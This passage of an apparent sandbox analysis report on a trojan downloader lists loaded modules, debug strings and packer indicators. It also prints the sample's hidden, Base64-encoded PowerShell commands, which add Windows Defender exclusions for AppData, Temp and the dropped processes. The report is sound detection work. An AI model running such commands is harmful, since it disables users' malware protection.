Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: atiadlxx.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: nvapi64.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: atiadlxy.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Static file information: File size 1326080 > 1048576
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x140e00
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: Qatvhs.pdb source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000002.00000002.1480296613.00000000042EC000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000002.00000002.1480296613.0000000004110000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000002.00000002.1490428005.0000000005520000.00000004.08000000.00040000.00000000.sdmp, Keywords.exe, 00000007.00000002.1635965900.00000000046DE000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000015.00000002.2866397789.000000000473E000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000002.1447665099.000000000459A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000002.1443307685.00000000031DC000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000002.1461796579.0000000005F90000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000002.00000002.1480296613.0000000004497000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000002.00000002.1480296613.0000000004555000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000002.00000002.1470593707.0000000003038000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000005.00000002.1530270940.0000000002AFD000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000007.00000002.1635965900.00000000048B3000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000007.00000002.1588820194.00000000034A1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1685032824.0000000003931000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1685032824.0000000003981000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1635084673.0000000002C44000.00000004.00000800.00020000.00000000.sdmp, fdyryi.exe, 0000000F.00000002.1746723723.0000029A0036B000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000011.00000002.1872584736.0000000002F88000.00000004.00000800.00020000.00000000.sdmp, AlgorithmType.exe, 00000014.00000002.1910595763.000001B806521000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000017.00000002.1968077949.00000154E5C11000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000017.00000002.2317223461.00000154F5DF2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000017.00000002.2317223461.00000154F5DF4000.00000004.00000800.00020000.00000000.sdmp, pjmskbbdr.exe, 0000001B.00000002.2248679548.000000000342E000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000002.1447665099.000000000459A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000002.1443307685.00000000031DC000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000002.1461796579.0000000005F90000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000002.00000002.1480296613.0000000004497000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000002.00000002.1480296613.0000000004555000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000002.00000002.1470593707.0000000003038000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000005.00000002.1530270940.0000000002AFD000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000007.00000002.1635965900.00000000048B3000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000007.00000002.1588820194.00000000034A1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1685032824.0000000003931000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1685032824.0000000003981000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1635084673.0000000002C44000.00000004.00000800.00020000.00000000.sdmp, fdyryi.exe, 0000000F.00000002.1746723723.0000029A0036B000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000011.00000002.1872584736.0000000002F88000.00000004.00000800.00020000.00000000.sdmp, AlgorithmType.exe, 00000014.00000002.1910595763.000001B806521000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000017.00000002.1968077949.00000154E5C11000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000017.00000002.2317223461.00000154F5DF2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000017.00000002.2317223461.00000154F5DF4000.00000004.00000800.00020000.00000000.sdmp, pjmskbbdr.exe, 0000001B.00000002.2248679548.000000000342E000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000002.1461192975.0000000005EE0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000002.1443307685.0000000003123000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000002.00000002.1480296613.0000000004497000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000002.00000002.1480296613.00000000042EC000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000005.00000002.1530270940.0000000002C98000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1635084673.0000000002B8B000.00000004.00000800.00020000.00000000.sdmp, fdyryi.exe, 00000010.00000002.2305476496.000001A956CF2000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000011.00000002.1872584736.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000011.00000002.2144258743.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp, AlgorithmType.exe, 00000014.00000002.2143085214.000001B81637E000.00000004.00000800.00020000.00000000.sdmp, AlgorithmType.exe, 00000016.00000002.2526240071.0000020541BF7000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000017.00000002.2317223461.00000154F5B27000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: Zjcufvpnldc.pdb source: fdyryi.exe, 00000010.00000002.2305476496.000001A95698A000.00000004.00000800.00020000.00000000.sdmp, fdyryi.exe, 00000010.00000002.2305476496.000001A956A92000.00000004.00000800.00020000.00000000.sdmp, AlgorithmType.exe, 00000016.00000002.1915461122.00000205312B0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000002.1461192975.0000000005EE0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000002.1443307685.0000000003123000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000002.00000002.1480296613.0000000004497000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000002.00000002.1480296613.00000000042EC000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000005.00000002.1530270940.0000000002C98000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1635084673.0000000002B8B000.00000004.00000800.00020000.00000000.sdmp, fdyryi.exe, 00000010.00000002.2305476496.000001A956CF2000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000011.00000002.1872584736.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000011.00000002.2144258743.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp, AlgorithmType.exe, 00000014.00000002.2143085214.000001B81637E000.00000004.00000800.00020000.00000000.sdmp, AlgorithmType.exe, 00000016.00000002.2526240071.0000020541BF7000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000017.00000002.2317223461.00000154F5B27000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: .pdb source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000000.1391740961.00000000009D2000.00000002.00000001.01000000.00000003.sdmp, Keywords.exe, 00000007.00000002.1635965900.00000000048B3000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains method to dynamically call methods (often used by packers)
Source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.3f36b50.5.raw.unpack, bRjamkahGpNcHlBjdu.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
.NET source code contains potential unpacker
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, Program.cs .Net Code: Main System.AppDomain.Load(byte[])
Source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.5f90000.12.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.5f90000.12.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.5f90000.12.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
Source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.3f36b50.5.raw.unpack, Program.cs .Net Code: Xg1doFjPu7c2IBWoGI0 System.AppDomain.Load(byte[])
Source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.5ee0000.11.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
Source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.5ee0000.11.raw.unpack, ListDecorator.cs .Net Code: Read
Source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.5ee0000.11.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
Source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.5ee0000.11.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
Source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.5ee0000.11.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGIAcgBvAGsAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAYgByAG8AawBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABLAGUAeQB3AG8AcgBkAHMALgBlAHgAZQA7AA==
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGIAcgBvAGsAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAYgByAG8AawBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABLAGUAeQB3AG8AcgBkAHMALgBlAHgAZQA7AA==
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGIAcgBvAGsAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAE4AYQBtAGUAZABQAGUAcgBtAGkAcwBzAGkAbwBuAFMAZQB0AHMAXABBAGwAZwBvAHIAaQB0AGgAbQBUAHkAcABlAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAYgByAG8AawBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAIAAtAEYAbwByAGMAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABiAHIAbwBrAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABOAGEAbQBlAGQAUABlAHIAbQBpAHMAcwBpAG8AbgBTAGUAdABzAFwAQQBsAGcAbwByAGkAdABoAG0AVAB5AHAAZQAuAGUAeABlAA==
Yara detected Costura Assembly Loader
Source: Yara match File source: 5.2.Keywords.exe.2c7c62c.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.57a0000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.fdyryi.exe.1a956b59048.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.fdyryi.exe.29a74620000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.4232040.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.AlgorithmType.exe.20541af90b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.5de0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.Keywords.exe.46de9f0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.Keywords.exe.45fcbd0.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.Keywords.exe.465cbd0.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.fdyryi.exe.1a946430000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.42aa080.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.42ecbd0.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.425a060.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.Keywords.exe.473e9f0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.pjmskbbdr.exe.34a868c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.AlgorithmType.exe.20541a59080.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.4cbea78.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.AlgorithmType.exe.205419e1010.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.43ce9f0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.pjmskbbdr.exe.345f858.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.42ecbd0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.fdyryi.exe.1a956c490b8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.Keywords.exe.2ea8380.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.fdyryi.exe.1a956b59048.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.AlgorithmType.exe.205419e1010.5.unpack, type: UNPACKEDPE
